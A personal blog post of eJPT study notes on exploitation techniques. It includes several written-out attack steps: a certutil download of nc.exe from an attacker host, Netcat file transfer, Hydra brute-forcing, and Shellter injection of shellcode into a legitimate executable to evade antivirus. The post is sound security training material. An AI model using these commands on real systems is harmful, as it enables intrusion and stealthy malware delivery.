eJPT - 3.4 Exploitation

HmadHmad
14 min read

Table of contents

Introduction

Exploitation consists of techniques and tools used by adversaries / penetration testers to gain an initial foothold on a target system or network. You can only exploit a target if you know what is vulnerable.

Exploitation methodology:

  • Identify vulnerable services

  • Identify and prepare exploit code

  • Gaining access

  • Obtain remote on target system

  • Bypass AV detection

  • Pivot onto other systems

Vulnerability Scanning

Banner Grabbing

This is an information gathering technique used by penetration testers to enumerate information regarding the target operating system as well as the services that are running on its open ports. The primary objective is to identify the service running on a specific port as well as its version.

Banner grabbing can be performed through various techniques:

  • A service version detection scan with Nmap

  • Connecting to the open port with Netcat

  • Authenticating to the service (SSH, FTP, Telnet, etc.)

There is a very good Nmap script for banner grabbing called banner. Can sometimes be useful but not always necessary as most of the time the service detection Nmap scan gives you the same information.

We can use Netcat by running the following command followed by the port that you want to scan.

nc 10.10.10.10 (target_ip) 80 (target_port)

Nmap Scripts

Nmap scripts are located at /usr/share/nmap/scripts/. View some of the notes for this section here.

As an example, we can use the shellshock script in this case with the following command.

nmap -sV -p 80 --script=http-shellshock --script-args= "http-shellshock.uri=/gettime.cgi" 10.10.10.10

Scanning with Metasploit

We covered Metasploit in depth (including port scanning, enumeration, exploitation and post-exploitation) in the two previous blog posts. Click here for the first and here for the second post.

Exploits

After identifying a potential vulnerability within a target or a service running on a target, the next step is to find an exploit to exploit the vulnerability. It is important to note that downloading and running exploit code against a target can be quite dangerous. It is therefore recommended to analyse the exploit code closely to ensure that it works as intended. You can also use GitHub as long you are sure, nothing malicious is happening in the background.

There are a handful of legitimate and vetted exploit databases such as:

  • Exploit Database

  • Rapid 7

SearchSploit

The entire Exploit Database comes pre-packaged with Kali providing you with all the exploits locally and you can search or query them with SearchSploit.

The exploits are located at /usr/share/exploitdb. It's important to note that you need to keep SearchSploit updated to have the latest exploits which we can do with -u. We can download the exploit using the exploit IDs using -m. To perform a case sensitive search, use the flag -c. You can use -e to perform an exact search.

Note - to get the links to the exploit online, use the -w option.

Fixing Exploits

Once you have downloaded an exploit, make sure to read through the code to edit the options which you need to set. You have to follow the directions mentioned to ensure that the exploit works.

Compiling Exploits

In certain cases, exploit code will be developed in C/C++/C# and therefore we will need to compile the exploit code to a portable executable (PE) or binary.

Cross-compiling is the process of compiling code for a platform other than the one performing the compilation. As in compiling a file for a target system (e.g. using a Kali Linux machine to compile an exploit for a Windows machine).

To compile code for a Windows machine, you will need a few tools. One of them is called Mingw-w64 which is a development environment to create Microsoft PE applications. We can download it one Linux using the following command:

sudo apt-get install mingw-w64

In terms of compiling, you can compile a 32-bit or a 64-bit file. Highly recommended to compile a 32-bit file as this will work on both systems. Once you have downloaded the code, we will compile the exploit as a 64-bit file:

i686-w64-mingw32-gcc 9303.c (exploit_id) -o exploit

To now compile for 32-bit systems:

i686-w64-mingw32-gcc 9303.c (exploit_id) -o exploit -lws2_32

For Linux, you will require having the GNU compiler installed:

sudo apt-get install gcc

To compile the exploit code for Linux:

gcc -pthread 40839.c -o exploit -lcrypt

A very useful resource is the GitHub repository by OffSec. It contains a list of pre-compiled binaries (mainly Windows). You can view it on GitLab here.

Bind & Reverse Shells

Netcat Fundamentals

Netcat is a networking utility used to read and write data to network connections using TCP/UDP. You can use it for cross-platform engagements. It utilizes a client-server communication architecture with two modes:

  1. Client mode - to connect to any TCP/UDP port as well as a Netcat listener

  2. Server mode - to listen for connections form clients on a specific port

It can be used to perform the following functionality:

  • Banner grabbing

  • Port scanning

  • Transferring files

  • Bind or reverse shells

By default, Netcat will use TCP ports - to use UDP ports, use the options -u.

To run Netcat as a listener on a Windows system, we can transfer the Netcat executable which can be found on our system (/usr/share/windows-binaries) in 2 ways. Firstly, we need to host the file on a web server which we have looked at previously.

python -m SimpleHTTPServer 80
python3 -m simple.http 80

Then we can either download it via a web browser or via the command prompt on the target system.

certutil -urlcache -f http://10.10.10.10/nc.exe nc.exe

We can now setup a listener on our machine. We can utilize the target machine to connect to the listener. This is just a proof of concept to prove that the Netcat listener works.

To transfer files with Netcat, you need have a listener that will receive the file/s.

# To set up the listener (destination of the file)
nc -nlvp 1234 > test.txt

# To transfer the file (where you are sending the file from)
nc -nv 10.10.10.10 (ip_listener) 1234 < test.txt

Bind Shells

A bind shell is a type of remote shell where the attacker connects directly to listener on the target system, consequently allowing for execution of commands on the target system. However, this is not recommended as we will require access to the target already and that inbound traffic to the target is likely to be blocked or filtered by a firewall.

A Netcat listener can be setup to execute a specific executable when a client connects to the listener. The -e option is typically used to specify a shell. For Linux systems, we can execute a shell using the -c option.

Reverse Shells

Reverse shells are much better than bind shells as we need to set up a Netcat listener on the target system which is not possible if we don't have access to the target system. Another reason is that inbound traffic to a system is generally blocked or filtered by a firewall which means that a bind shell will likely fail. With a reverse shell, traffic is normally not blocked as it's outbound traffic.

To obtain a reverse connection, the target system needs to connect to our listener for us to gain a reverse shell. One of the disadvantages of a reverse shell is that the target needs to connect to our machine which in turn means that the target will be connecting to our IP address and so if that connection is ever noted, then our IP address is leaked.

Cheat Sheets

There is a GitHub repository called Payloads All The Things. This is essentially a list of commands or code that can be used to connect back to our listener to get a reverse connection. You can view it on GitHub here or here.

Another useful resource is a Reverse Shell Generator which generates commands to use as well as msfvenom commands, etc. You can view the tool here.

Power-Shell Empire

This is an introduction to Power-Shell Empire. It’s a pure PowerShell exploitation or post-exploitation framework built on cryptological-secure communications and flexible architecture. It implements the ability to run PowerShell agents without needing powershell.exe. It's mostly used on Windows targets.

Starkiller is a GUI front-end for the PowerShell Empire. Its an Electron application written in VueJS. PowerShell Empire & Starkiller are both available as packages in the Kali Linux repositories.

To start up the PowerShell Empire back-end server and the client

sudo powershell-empire server
sudo powershell-empire client

View the documentation here for further information. Another framework is Metasploit which we have covered in depth already.

Exploitation

Windows Black Box Penetration Test

This is a security assessment whereby the penetration tester is not provided with any information regarding the target system or network (i.e. no IP ranges, system information or default credentials) are provided.

The objective of a black box penetration test is to accurately test the security of a system or network as an external unprivileged adversary.

Scenario & Scope

You have just begun your first job as a Junior Penetration Tester and have been assigned to assist in performing in performing a penetration test on a client's network The pentest lead has assigned you to gain access / exploit a host running Windows Server 2008.

You are permitted to use the Metasploit Framework.

Your primary objectives are to:

  • Identify services running on the target

  • Identify vulnerabilities within the services

  • Exploit these vulnerabilities to obtain an initial foothold

Portscanning & Enumeration

Since the lab is in the cloud, the easiest way to check to find the target IP address to check the hosts file (/etc/hosts) or you can ping demo.ine.local.

  1. Basic Nmap service version and OS detection scan to get a quick idea

  2. Run an Nmap UDP port scan

  3. Another Nmap scan (but more in depth and running Nmap scripts) and export it into an XML file to input into Metasploit

  4. Perform some banner grabbing with Netcat

Microsoft IIS FTP

Normally, the web application is accessible by ftp and ftp is used to login to that server. The first thing to do is to check if the ftp server allows anonymous login. We can do using the Nmap script ftp-anon or you could test it manually which in this case, it's not enabled.

Next, we can perform a brute-force on the ftp server via Hydra to find some credentials. Once we are logged in, we can see that asp files are supported. What we could do now, is generate an asp payload using msfvenom to get a reverse shell.

OpenSSH

We can perform another brute-force with Hydra using the two user accounts to find out if those credentials work. We could also use the Metasploit module ssh_login to check or perform a brute-force.

SMB

We can use Hydra to brute-force credentials to login via SMB. We can then view shares using smbclient or smbmap. You can also use enum4linux to enumerate information or you can do so via Metasploit modules. You can use PsExec to authenticate with SMB and we will have a command prompt. We can also exploit SMB via the Eternal Blue vulnerability as the system is vulnerable.

MySQL

Again, we can perform a brute-force with Hydra or the Metasploit module (mysql_login). We can then view the information in the MySQL database server.

Linux Black Box Penetration Test

Scenario & Scope

You have just begun your first job as a Junior Penetration Tester and have been assigned to assist in performing in performing a penetration test on a client's network The pentest lead was pleased with your ability to gain access to the Windows Server target and has a assigned you to perform a pentest on a Linux server.

You are permitted to use the Metasploit Framework.

Your primary objectives are to:

  • Identify services running on the target

  • Identify vulnerabilities within the services

  • Exploit these vulnerabilities to obtain an initial foothold

Vsftpd

In this case, the system is running vsftpd 2.3.4 which we know has a vulnerability. However, it has been patched by the system administrator. Now, we can perform a brute-force attack using Hydra to get credentials. To narrow down the brute-force, let's see if we can see what user accounts are on the system. We can find out by exploiting the smtp service running on port 25.

There is a Metasploit module called smtp_enum which we can use to find out the user accounts. We can identify a user called service and then perform a brute-force. Now, login to the ftp server and then upload a php file to the WebDAV server.

PHP

One directory or file to check on an Apache server is the phpinfo.php file. There is a vulnerability for the PHP version that is running on the target. We can then edit the Python file to run a PHP command that will give us a reverse shell. Alternatively, we can use the Metasploit module.

SAMBA

Since our Nmap scan doesn't give us the exact version of SAMBA running, we can use the Metasploit module called smb_version. We can run a SearchSploit command for that version for which there is an exploit module.

AV Evasion & Obfuscation

AV Evasion with Shellter

Defence Evasion consists of techniques that adversaries use tot avoid detection throughout their compromise. Techniques used for defence include uninstalling or disabling security software or obfuscating or encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. (Taken from MITRE). Essentially, we're trying to change the signature of a payload that we generate using msfvenom for example.

AV software will typically utilize signature, heuristic and behaviour based detection.

  1. Signature based detection: An AV signature is a unique sequence of bytes that uniquely identifies malware. As a result, you will have to ensure that your obfuscated exploit or payload doesn't match any known signature in the AV database.

  2. Heuristic based detection: This relies on rules or decisions to determine whether a binary is malicious. It also looks for specific patterns within the code or program calls made by an executable.

  3. Behaviour based detection: This relies on identifying malware by monitoring it's behaviour - which is generally used for newer strains of malware. This checks what the program does when it runs (i.e. does it access the Windows registry or anything else that it suspicious).

On-disk Evasion Techniques

  • Obfuscation - the process of concealing something important, valuable or critical. Obfuscation reorganizes the code in order to make it harder to analyse or read.

  • Encoding - the process involves changing data into a new format using a scheme (e.g. encoding into base 64). However, it's a reversible process and can be decoded.

  • Packing - involves generating an executable with a new binary structure with a a smaller size and therefore provides the payload with a new signature.

  • Crypters - encrypts code or payloads and decrypts the encrypted code in memory. The decryption key is normally stored in a stub. This is one of the techniques that is used in new strains of ransomware.

In-memory Evasion Techniques

  • Focuses on manipulation of memory and doesn't write files to disk

  • Injects payloads into a process by leveraging various Windows APIs

  • The payload is then executed in memory in a separate thread

Notes

You can view the documentation and other information about Shellter here. To install Shellter, you can install it on Linux using the command below.

sudo apt-get install shellter -y

You need to note that Shellter is a Windows executable. To run a Windows executable on a Linux or Unix system (e.g. Mac) you need Wine (32-bit) which you can install using the commands below.

sudo dpkg --add-architecture i386
sudo apt-get install wine32

To now execute Shellter:

cd /usr/share/windows-resources/shellter
sudo wine shellter.exe

In this case, the executable we will be using vncviewer and we will inject our shell code into it. We will first create a directory with the executable in it. Then:

# When asked to choose an operation mode:
A

# When asked to enter in the PE target:
/home/kali/Desktop/AVBypass/vncviewer.exe

# When asked to enable stealth mode (whether to retain the original functionality of the executable):
Y

# You can then select a listed or custom payload (e.g an msfvenom payload)

Obfuscation

Obfuscation refers to the process of concealing something important valuable or critical. Obfuscation reorganizes code in order to make it harder to analyse. As a penetration tester, you will find yourself working with PowerShell code frequently. Most AV solutions will immediately flag malicious PowerShell code, and as a result, you must be able to obfuscate or encode your PowerShell code and scripts in order to avoid detection.

Invoke-Obfuscation is an open source PowerShell v2.0+ compatible PowerShell command and script obfuscator. You can view the GitHub repository here to learn more about it.

We can run PowerShell modules or code in Linux using certain dependencies which we can download:

sudo apt-get install powershell -y

# To launch PowerShell
pwsh

We can now run PowerShell code on our Linux system.

### To import a module
Import-Module ./Invoke-Obfuscation.ps

### To run it
Invoke-Obfuscation

### To load our PowerShell reverse shell code
SET SCRIPTPATH /home/kali/Desktop/shell.ps1

Once we have obfuscated our code, we can transfer it to the target system by hosting a web server to host the file. We can then download it on the target system.

That’s it for this section. Next one up is the CTF or skill check that iNE has put up.

— Hmad

0
Subscribe to my newsletter

Read articles from Hmad directly inside your inbox. Subscribe to the newsletter, and don't miss out.

ejptExploitationvulnerabilityAntiVirusPowershellnmapexploitWindowsLinux

Written by

Hmad
Hmad

I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.